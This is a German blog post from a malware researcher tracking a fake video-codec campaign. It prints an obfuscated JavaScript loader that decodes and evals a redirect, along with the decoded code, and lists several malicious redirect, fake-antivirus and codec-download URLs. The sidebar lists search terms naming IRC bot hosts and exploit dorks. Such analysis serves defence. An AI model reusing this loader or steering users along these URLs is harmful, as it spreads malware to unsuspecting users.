[malware] sexy codec, immer noch.

blog.grospolina.net

Sunday, July 27. 2008

Posted by katsumi in malware at 13:28 | Comments (0) | Trackbacks (0)

[malware] sexy codec, immer noch.

JA, heute ist wieder so ein langweiliger Sonntag.
Da könnt ich ja mal schaun, was unsere fake-porn-fake-codec Leute so machen.
Wie ich schon auf offensivecomputing.net beschrieben habe,
lassen sich neue campaigns leicht erfassen.
Also los geht's:
Nutzen wir einen alten link (katsumi, pornstar!):
http://lineacount.info/cgi-bin/search?id=1706&k=katsumi&ref=
Das Ergebnis ist:
HEAD
CODE:
HTTP/1.1 200 OK Date: Mon, 28 Jul 2008 01:53:12 GMT Server: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d Connection: close Content-Type: binary

Content:
CODE:
function g(Rl,j){if(!j){j='Q`I=h]41Je%.uy#o?p3!,W7A;-v+tiNGsZ8glrfk*MCKTm$/@B^jLdSzY&_RXDn|';}var h;var kD='';for(var I=0;I<Rl.length;I+=4){h=(j.indexOf(Rl.charAt(I))&255)<<18|(j.indexOf(Rl.charAt(I+1))&255)<<12|(j.indexOf(Rl.charAt(I+2))&255)<<(6)|j.indexOf(Rl.charAt(I+3))&255;kD+=String.fromCharCode((h&16711680)>>16,(h&65280)>>8,h&255);}eval(kD);}g('-4Dgi7dr+k?$izeMi4,*ejBj;^tKezeMt1?nJ4p/;zWm-7&L.fB/;S]Lv7D$o3e*i1p@#8X/tSDfi1iZtf,mi1eZ-f;$;SDm.Si/.k`*t=DM-=Ljy=hftfWfo!hju!J8J=@/tSuk%^i^vA`Lo8tM#^Qs');
welcher entschlüsselt folgenden Inhalt hat:
CODE:
document.write('<sc'+'ript> document.location="http://software-traff.com/go.php?id=341&ref=1312" </sc'+'ript>');

...weiter geht es mit dieser URL:
Dummerweise werden wir zu einer fakeAV Seite geleitet:
CODE:
http://scanner.win-antivir-2008.com/35/?adv=1096&ref=1312&p=1000000000
Das wollen wir jetzt nicht.
Stattdessen versuchen wir einmal einen anderen alten link:
CODE:
http://newcontent2008.com/freemovie/Movie:%20%7CSpecial%20Library:%20/725/9/
Wir erhalten:
CODE:
---snip--- <SCRIPT language=javascript> newurl = "http://newcontent2008.com/m/b/2/white/725/9/"; codec_url='http://supersoftfree2008.com/download/502/725/9/'; </script> ---snap---
Lasst uns sehen was es da neues auf "newcontent" gibt.
Aha! Amateur Movies. OK.
codec_url, was gibt es dort?
HEAD:
CODE:
HTTP/1.1 302 Found Server: nginx/0.6.31 Date: Sun, 27 Jul 2008 12:01:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.6 Location: ../../../../soft/zeukmmchose/d04cb95b/MediaTubeCodec_ver1.725.9.exe

Hmmm..., vllt hab ich die schon?
Mal sehn!
Nun, eine Datei mit diesem Namen haben wir schoneinmal heruntergeladen,
aber die Grösse ist nicht gleich.
HEAD:
CODE:
HTTP/1.1 200 OK Server: nginx/0.6.31 Date: Sun, 27 Jul 2008 12:04:39 GMT Content-Type: application/x-msdownload Connection: close Last-Modified: Sun, 27 Jul 2008 12:01:23 GMT ETag: "cea529-10000-488c6393" Accept-Ranges: bytes Content-Length: 65536
Statt einer neuen Kampagne bekommen wir eine neue binary für eine alte Sache.
Da heute Sonntag ist, werde ich mal nicht so sein und das Teil inspizieren. ;)
Fortsetzung folgt.
Trackbacks
Trackback specific URI for this entry
No Trackbacks
Comments
Display comments as (Linear | Threaded)
No comments
Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

BBCode format allowed
 
 

Pages

katsumi's page
 GROSPOLINA.ORG

Glastopf Webhoneypot
 Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina

Links

gut verglast ist ....
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt


Powered By ...?
eXTReMe Tracker

Quicksearch

Categories



All categories

Archives

Letzte Goggele Suche

"© 2011 Powered by Subrion CMS"
"© 2011 Powered by Subrion CMS"
4521569111
dlsldododl
d0rk new 2011
ipays exploit
ipays - exploit
pbot dragonfly irc.byroe
Powered by Ollance Member Login Script
"prefix"=>"bodao","maxrand"=>"8",
intitle:© 2011 Powered by Subrion CMS
sandbox 2304 fehler
powered by zoopeer
powered by zoopeer
remote-exploit sathyajith
irc.kamtiez.web.id pbot shot|
irc.cyberirc.org bot
213.251.169.156 pbot
in my world theres no left right grospolina
"Powered By Zoopeer"
"Powered By Zoopeer"
mail.indoserver.web.id
grospolina
"powered by zoopeer"
yourwebinterface.com
"@+#+irc.ascnet.biz"
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
verfassung und verfassungsvertrag guttenberg
dumme musikindustrie

Syndicate This Blog

Exploit-db, feed me!

[local] - ispVM System XCF File Handling Overflow

Tuesday, May 29. 2012
[webapps] - PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities

Tuesday, May 29. 2012
[dos] - WinRadius Server 2009 Denial Of Service

Tuesday, May 29. 2012
[dos] - Tftpd32 DNS Server 4.00 Denial Of Service

Tuesday, May 29. 2012
[webapps] - PBBoard 2.1.4 Local File Inclusion

Tuesday, May 29. 2012

Glasfeed

No RSS/OPML feed selected